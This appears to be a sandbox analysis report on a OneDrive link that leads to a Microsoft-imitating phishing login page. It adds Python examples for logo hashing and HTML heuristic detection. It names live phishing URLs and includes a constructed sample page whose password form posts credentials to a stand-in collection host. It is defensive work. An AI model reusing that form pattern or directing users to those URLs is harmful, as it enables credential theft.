Windows Analysis Report
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9

Overview

General Information

Sample URL: https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Analysis ID: 562252

Detection

HTMLPhisher
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Antivirus detection for URL or domain
Phishing site detected (based on logo template match)
Phishing site detected (based on image similarity)
Yara signature match
No HTML title found
HTML body contains low number of good links
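Three of the signatures above (favicon image match, logo template match, image similarity) fire on pictures rather than text. The sandbox's own matcher is not published; the block below is an added example, not part of this report or of the vendor's code, showing the usual shape of such a check with a perceptual average hash (aHash): downscale to 8x8, threshold each pixel against the mean, and compare the resulting bit strings by Hamming distance. Every image here is constructed inline as rows of grayscale values so it runs offline; the "constructed-brand" reference and the `threshold` of 8 bits are assumptions, not values taken from the report.

```python
"""Added example: brand-image matching with an average hash (aHash).

Images are plain lists of rows of 0-255 grayscale values, built inline,
so nothing is downloaded. This is a generic aHash, not the sandbox's matcher.
"""


def downscale(img, size=8):
    """Block-average a list-of-rows grayscale image to size x size."""
    h, w = len(img), len(img[0])
    bh, bw = h // size, w // size
    out = []
    for by in range(size):
        row = []
        for bx in range(size):
            block = [img[y][x]
                     for y in range(by * bh, (by + 1) * bh)
                     for x in range(bx * bw, (bx + 1) * bw)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out


def ahash(img, size=8):
    """size*size-bit integer: bit set where the downscaled pixel > mean."""
    small = downscale(img, size)
    pixels = [p for row in small for p in row]
    mean = sum(pixels) / len(pixels)
    bits = 0
    for p in pixels:
        bits = (bits << 1) | (1 if p > mean else 0)
    return bits


def hamming(a, b):
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")


def make_flag(width=32, height=32, offset=0, noise=0):
    """Constructed 'logo': four quadrants of different brightness.

    offset shifts brightness (re-encoded/brightened copy); noise adds a small
    deterministic per-pixel perturbation (lossy recompression). Values clip.
    """
    img = []
    for y in range(height):
        row = []
        for x in range(width):
            q = (y >= height // 2) * 2 + (x >= width // 2)
            base = [40, 120, 180, 230][q]
            v = base + offset
            if noise:
                v += (x * 7 + y * 13) % (noise + 1)
            row.append(max(0, min(255, v)))
        img.append(row)
    return img


def make_stripes(width=32, height=32):
    """Constructed unrelated image: vertical 4-px black/white stripes."""
    return [[255 if (x // 4) % 2 == 0 else 0 for x in range(width)]
            for _ in range(height)]


# Reference table a detector would keep per brand (constructed, one entry).
BRAND_HASHES = {"constructed-brand": ahash(make_flag())}


def match_brand(img, threshold=8):
    """Return (brand, distance) for the closest reference within threshold,
    else (None, distance). threshold is an assumed tuning value."""
    h = ahash(img)
    brand, ref = min(BRAND_HASHES.items(), key=lambda kv: hamming(h, kv[1]))
    d = hamming(h, ref)
    return (brand, d) if d <= threshold else (None, d)


if __name__ == "__main__":
    # A brightened, noisy copy of the reference still matches; stripes do not.
    print(match_brand(make_flag(offset=25, noise=6)))
    print(match_brand(make_stripes()))
```

The point of hashing the downscaled, mean-thresholded image rather than the raw bytes is that a phishing kit that re-encodes, resizes or slightly brightens a vendor logo (as a hosted PNG on an unrelated domain would typically be) keeps a near-identical aHash while a byte-level MD5, like the ones listed for the matched images further down this report, would no longer collide.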

Classification

AV Detection

Source: https://magenta-flicker-surprise.glitch.me/freedo.html SlashNext: Label: Fake Login Page type: Phishing & Social Engineering
Source: https://shopget24.com/images/sampledata/hack-run.png Avira URL Cloud: Label: phishing

Phishing

Source: https://magenta-flicker-surprise.glitch.me/freedo.html Matcher: Template: office matched with high similarity
Source: Yara match File source: 13645.4.pages.csv, type: HTML
Source: https://magenta-flicker-surprise.glitch.me/freedo.html Matcher: Template: office matched
Source: embedded Matcher: Found strong image similarity, brand: Microsoft image: 13645.4.img.2.gfk.csv C3FC46C5799C76F9107504028F39190F
Source: embedded Matcher: Found strong image similarity, brand: Microsoft image: 13645.4.img.3.gfk.csv FE22440D79FFA34950F512EF4A718B2A
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: HTML title missing
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: Number of links: 0
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: No <meta name="author".. found
Source: https://magenta-flicker-surprise.glitch.me/freedo.html HTTP Parser: No <meta name="copyright".. found
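The "HTTP Parser" findings above (missing title, zero links, no author or copyright meta tag) are cheap structural heuristics: a real vendor sign-in page carries a title, a footer full of outbound links and descriptive meta tags, while a harvested template copied into a kit usually drops all of them. The block below is an added example, not the sandbox's parser, that re-implements those four checks over HTML with Python's standard-library `html.parser` and, as an extra heuristic the report does not use, flags a password form whose `action` posts to a host other than the page's own. The `SAMPLE_HTML` is constructed for the example (it is not the content of freedo.html, which this report does not reproduce), and the form target `example.invalid` and the "fewer than two good links" cut-off are assumptions.

```python
"""Added example: structural phishing heuristics over an HTML page.

Re-implements the report's "HTTP Parser" checks (title missing, link count,
missing author/copyright meta) plus one assumed extra check (off-site
password form). Stdlib only; the sample page is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on a credential-harvesting page. Not freedo.html.
SAMPLE_HTML = """<html><head>
<meta charset="utf-8">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
</head><body>
<img src="https://shopget24.com/images/sampledata/hack-run.png">
<form method="post" action="https://example.invalid/collect.php">
  <input type="email" name="user"><input type="password" name="pass">
  <button type="submit">Sign in</button>
</form></body></html>"""


class PageFeatures(HTMLParser):
    """Collects the handful of features the heuristics need."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.links = []            # href values of <a> tags
        self.meta = {}             # lower-cased name -> content for <meta name=...>
        self.forms = []            # action attribute of each <form>
        self.password_inputs = 0   # count of <input type="password">

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)            # attribute values may be None (bare attributes)
        if tag == "title":
            self._in_title = True
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "meta" and a.get("name"):
            self.meta[a["name"].lower()] = a.get("content") or ""
        elif tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def good_links(links, page_url):
    """Absolute http(s) links pointing at a host other than the page's own."""
    host = urlparse(page_url).hostname
    out = []
    for href in links:
        p = urlparse(href)
        if p.scheme in ("http", "https") and p.hostname and p.hostname != host:
            out.append(href)
    return out


def score_page(html, page_url):
    """Return the list of findings, phrased like the report's signatures."""
    f = PageFeatures()
    f.feed(html)
    findings = []
    if not f.title.strip():
        findings.append("HTML title missing")
    if len(f.links) == 0:
        findings.append("Number of links: 0")
    elif len(good_links(f.links, page_url)) < 2:   # cut-off is an assumption
        findings.append("HTML body contains low number of good links")
    for name in ("author", "copyright"):
        if name not in f.meta:
            findings.append(f'No <meta name="{name}".. found')
    # Assumed extra heuristic, not in the report: a password form whose
    # action posts to a different host than the page was served from.
    host = urlparse(page_url).hostname
    for action in f.forms:
        target = urlparse(action).hostname
        if f.password_inputs and target and target != host:
            findings.append(f"Password form posts off-site to {target}")
    return findings


if __name__ == "__main__":
    page = "https://magenta-flicker-surprise.glitch.me/freedo.html"
    for line in score_page(SAMPLE_HTML, page):
        print(line)
```

Each finding on its own is weak (plenty of legitimate single-purpose pages have no links), which is why the report combines them with the image matches and the URL reputation hits before assigning a score; a detector built on this block should do the same rather than alert on any one feature.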
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: unknown HTTPS traffic detected: 104.19.143.111:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.219.248.46:443 -> 192.168.2.6:49979 version: TLS 1.2
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 28 Jan 2022 16:24:56 GMT; Content-Length: 3672; Connection: close; Cache-Control: max-age=0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Fri, 28 Jan 2022 16:24:57 GMT; Content-Length: 3672; Connection: close; Cache-Control: max-age=0
Source: angular.js.0.dr String found in binary or memory: http://angularjs.org
Source: data_3.2.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: data_3.2.dr String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: data_3.2.dr String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: data_3.2.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: data_3.2.dr String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: data_3.2.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: data_3.2.dr String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
Source: data_3.2.dr String found in binary or memory: http://crls.pki.goog/gts1c3/QqFxbi9M48c.crl0
Source: angular.js.0.dr String found in binary or memory: http://errors.angularjs.org/1.6.4-local
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr String found in binary or memory: http://llvm.org/):
Source: data_3.2.dr String found in binary or memory: http://ocsp.digicert.com0
Source: data_3.2.dr String found in binary or memory: http://ocsp.digicert.com0F
Source: data_3.2.dr String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: data_3.2.dr String found in binary or memory: http://ocsp.pki.goog/gts1c301
Source: data_3.2.dr String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: data_3.2.dr String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: data_3.2.dr String found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
Source: data_3.2.dr String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: data_1.2.dr String found in binary or memory: http://shopget24.com/images/sampledata/hack-run.png
Source: data_1.2.dr String found in binary or memory: http://shopget24.com/images/sampledata/hack-run.pngD
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://tools.ietf.org/html/rfc1950
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: data_3.2.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
Source: mirroring_hangouts.js.0.dr String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: data_1.2.dr String found in binary or memory: https://1drv.ms/o/s
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: data_1.2.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js
Source: data_1.2.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-2.1.3.min.js
Source: data_1.2.dr String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-2.1.3.min.js&
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://ajax.googleapis.com
Source: Network Action Predictor.0.dr String found in binary or memory: https://ajax.googleapis.com/
Source: data_1.2.dr String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: data_1.2.dr String found in binary or memory: https://amcdn.msftauth.net/me?partner=OneNoteOnline&version=10.21153.1&market=EN-US&wrapperId=suites
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://apis.google.com
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/resources/1033/FavIcon_OneNote.ico
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/resources/1033/FavIcon_OneNote.icosC
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/OneNoteSimplified.Wac.TellMeM
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-intl-mlr.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-navpane-strings.min.j
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-ribbon-intl.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-ribbon-intl.min.js5
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/onenote-ribbon-sprite-lazy.mi
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/1033/osfruntime_strings.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/Feedback/latest/Intl/en/officebrow
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/Feedback/latest/officebrowserfeedb
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/OfficeExtension.WacRuntime.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/OneNoteSimplified.Wac.TellMeSugges
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appChrome.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appChromeLazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appChromeLazy.min.jsD
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/appIconsLazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/common.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/common50.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/common50.min.jsl
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/hammer.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/navigation.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/onenoteloadingspinner.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreolazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreolazy.min.jsB
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreonavpane.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreonotebookpane.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreosearchpane.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/oreosearchpane.min.jsrj
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/osfruntime_ono.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/osfruntime_ono.jsUb
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/otelFullNext.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/js/suiteux.shell.con
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/js/suiteux.shell.cor
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/js/suiteux.shell.plu
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/suiteux-shell/strings/en/shellstri
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiFabricLazy.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiFabricLazy.min.jsv
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiSlice20.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/uiSlice20.min.jso
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_App_Scripts/wacairspaceanimationlibrary.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/Meetings_manifest.xml
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/agavedefaulticon96x96.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/box42.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/box42.pngGIF89a
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/box43.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/one.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/m2/one.pngS
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/moe_status_icons.png
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/moe_status_icons.png3
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/moeerrorux.css
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/progress.gif
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/progress.gify
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/161492041026_resources/1033/wapsw.png?b=1601492041026
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h03BB8ABC1B9A5DCE_resources/1033/OneNote.Refresh.css
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h03BB8ABC1B9A5DCE_resources/1033/OneNote.Refresh.cssc
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h07757BD4A5AB7D19_App_Scripts/wacBootNew.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h07757BD4A5AB7D19_App_Scripts/wacBootNew.min.js4E9
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h1660F93875D1DA61_App_Scripts/healthSmallOffline.worker.min
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h29DB8AD8C3F08967_App_Scripts/1033/WoncaIntl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h29DB8AD8C3F08967_App_Scripts/1033/WoncaIntl.js#x
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h2D66353A4E0ACF66_App_Scripts/1033/CommonIntl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h354425D0BEA81BEF_App_Scripts/onenote-boot.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h354425D0BEA81BEF_App_Scripts/onenote-boot.min.jsGIF89a
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h768633FA776B0791_App_Scripts/1033/OneNoteIntl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/h816A0F42A2BF4732_resources/1033/EditSurface.css
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCBA89239522795D5_App_Scripts/Compat.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCBA89239522795D5_App_Scripts/Compat.jsCnV
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDS.box4.dll1.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDS.box4.dll1.jsChIKBw1
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDS.box4.dll2.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDs.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCC787C190F40C7AA_App_Scripts/OneNoteDs.js#
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hCF8E38AF39F430EA_App_Scripts/jSanity.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hD379F9DC23A8E04A_App_Scripts/1033/Box4Intl.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hD8326BB4760631A8_App_Scripts/MicrosoftAjaxDS.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hDA9483E47A8473BE_App_Scripts/onenoteSyncNew.min.js
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hDA9483E47A8473BE_App_Scripts/onenoteSyncNew.min.js7&
Source: data_1.2.dr String found in binary or memory: https://c1-onenote-15.cdn.office.net/o/s/hE5C1E39EBD126206_App_Scripts/fonts/sharedheaderplaceholder
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/BrowserUls.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/CommonDiagnostics.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/CommonDiagnostics.jsxs
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/ExternalResources/js-cookie.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/ExternalResources/js-cookie.js1
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/Instrumentation.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/LearningTools/LearningTools.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/aria-web-telemetry-2.9.0.min.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/aria-web-telemetry-2.9.0.min.js%
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/pickadate.min.js
Source: data_1.2.dr String found in binary or memory: https://cdn.onenote.net/officeaddins/161492440463_Scripts/pickadate.min.js%
Source: data_1.2.dr String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_crtend_o.0.dr, pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://clients2.google.com
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://clients2.google.com/cr/report
Source: manifest.json1.0.dr, manifest.json0.0.dr, manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://clients6.google.com
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: Network Action Predictor.0.dr String found in binary or memory: https://code.jquery.com/
Source: data_1.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: data_1.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js&
Source: data_1.2.dr String found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://content-autofill.googleapis.com
Source: data_1.2.dr String found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIfCQBqDrrhfpceEgk
Source: data_1.2.dr String found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIfCU7H5x14rgQNEgk
